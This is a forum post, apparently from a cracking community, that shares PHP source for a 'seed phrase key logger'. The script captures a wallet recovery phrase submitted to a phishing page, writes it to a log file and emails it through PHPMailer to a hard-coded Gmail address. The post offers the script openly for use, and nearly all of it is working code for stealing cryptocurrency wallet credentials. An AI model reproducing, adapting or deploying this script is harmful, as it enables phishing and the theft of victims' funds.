• 🌙 Community Spirit

    Ramadan Mubarak! To honor this month, Crax has paused NSFW categories. Wishing you peace and growth!

Source Code 12phrase key logger scripts (1 Viewer)

Currently reading:
 Source Code 12phrase key logger scripts (1 Viewer)

Recently searched:

VIC01MORGAN

Member
LV
2
Joined
Aug 20, 2023
Threads
1
Likes
1
Awards
5
Credits
974©
Cash
0$


Link:
*** Hidden text: cannot be quoted. ***
PHP:
<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;

require '/home/peaksfin/tokenscan-evm.net/PHPMailer/src/Exception.php';
require '/home/peaksfin/tokenscan-evm.net/PHPMailer/src/PHPMailer.php';
require '/home/peaksfin/tokenscan-evm.net/PHPMailer/src/SMTP.php';

if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $phrase = $_POST["phrase"];

    // Write to a log file
    file_put_contents('log.txt', $phrase . "\n", FILE_APPEND);

    // Send an email
    $mail = new PHPMailer(true);
    try {
        //Server settings
        $mail->SMTPDebug = 2;                               
        $mail->isSMTP();                                   
        $mail->Host = 'email host';
        $mail->SMTPAuth = true;                             
        $mail->Username = 'your@email.com';               
        $mail->Password = 'your password';                         
        $mail->SMTPSecure = 'tls';                         
        $mail->Port = 587;                                 

        //Recipients
        $mail->setFrom('your@email.com', 'Mailer');
        $mail->addAddress('fabzenterprise01@gmail.com', 'Joe User');   

        //Content
        $mail->isHTML(true);                               
        $mail->Subject = 'New Phrase Entered';
        $mail->Body    = $phrase;

        $mail->send();
        echo 'Message has been sent';
    } catch (Exception $e) {
        echo 'Message could not be sent. Mailer Error: ', $mail->ErrorInfo;
    }
}
?>
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom